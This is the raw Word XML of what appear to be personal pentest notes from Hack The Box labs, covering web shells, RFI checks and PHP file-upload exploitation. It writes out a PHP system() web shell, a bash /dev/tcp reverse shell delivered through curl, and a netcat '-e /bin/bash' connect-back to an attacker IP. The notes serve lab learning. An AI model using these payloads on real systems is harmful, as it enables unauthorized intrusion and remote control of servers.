      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001058">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001059">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How use use Web Shells:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000105A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once you get a webshell, use it in the URL as such: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?cmd=</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000105B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ex. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/uploads/shell.php?cmd=</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000105C">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000105D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When you upload a reverse shell to a web server and then access it using RFI, here's how to check if it accepts executable files, or only plain text</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000105E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="888"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php echo "RFI test successful"; ?&gt;</w:t>
      </w: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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to reverse shell from a web shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001061">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="889"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from the Validation HTB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001062">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="889"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First find a way to inject a webshell into something like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/html/shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001063">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="889"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">That means you can run commands like this: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl http://10.10.11.116/shell.php?cmd=id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001064">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="889"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If your commands don't work, try using the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--data-urlencode</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" flag, like this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001065">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="889"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.50.11/project/uploads/users/420919-backdoor.php </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--data-urlencode</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> "cmd=which nc"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001066">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="889"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -nlvp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001067">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="889"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl http://[target IP]/shell.php --data-urlencode 'cmd=bash -c "bash -i &gt;&amp; /dev/tcp/[local IP]/[listening port] 0&gt;&amp;1"'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001068">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="889"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace shell.php with whatever web shell file you did</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001069">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="889"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can also check if netcat is installed, and if it is, we can do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000106A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="889"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check if netcat is installed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000106B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="889"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl http://[target IP]/shell.php --data-urlencode "cmd=which nc"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000106C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="889"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If it outputs a file path, then net cat is installed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000106D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="889"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Start listener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000106E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="889"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -nlvp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000106F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="889"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit using netcat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001070">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="889"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl http://[target IP]/shell.php --data-urlencode "cmd=nc -nv </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.50.129 4444 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-e /bin/bash"</w:t>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Uploading PHP reverse shells:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001073">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="244"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can test to see PHP file uploads are allowed and will run the PHP code by uploading the following payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001074">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="244"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo "&lt;?php phpinfo(); ?&gt;" &gt; test.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001075">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="244"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This puts the payload into a file called test.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001076">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="244"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If upon running we see the phpinfo() output, we know it is vulnerable to PHP payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001077">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="653"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once you upload them, they might not run immediately. They might sometimes just be stored. So, you will have to find out where they are located, and you can do this by URL path enumeration. You might find something like /uploads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001078">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="653"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And even if /uploads is forbidden and doesn't allow access, you can just try accessing it like: http://[IP]/uploads/file_name.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001079">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="653"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then even if the website doesn't load, check your listener to see if it worked</w:t>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b w:val="1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is a step by step process of how to get reverse shell when we are allowed to upload files to a web server but the files aren't run (PHP). This is from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Base Tier 2 Starting point</w:t>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highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Spoiler: It actually just works fine if you upload a reverse shell and then open the reverse shell!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000107F">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001080">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First, we have to find out where the files are uploaded. In the HTB, they are uploaded to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/_uploaded</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. We can find this from using ffuf and looking for any directories related to uploading</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001081">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo "&lt;?php phpinfo(); ?&gt;" &gt; test.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001082">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="167"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run this command to test if we are allowed to run php files, and if we are able to execute the files. This should display the phpinfo()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001083">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upload the file test.php, and then try running the file. In HTB, we could go to /_uploaded and then just click on the file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If that works, then we can try to upload a web shell that will allow code execution. We want the following payload: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php echo system($_REQUEST['cmd']);?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001085">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="167"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But, since we can't use echo due to the '' around cmd, we will have to manually create a file called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">webshell.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and then nano and add the payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001086">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="167"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is an example of how to create a webshell. We can also get a webshell by searching "Webshell github" or something specific like "PHP webshell"</w:t>
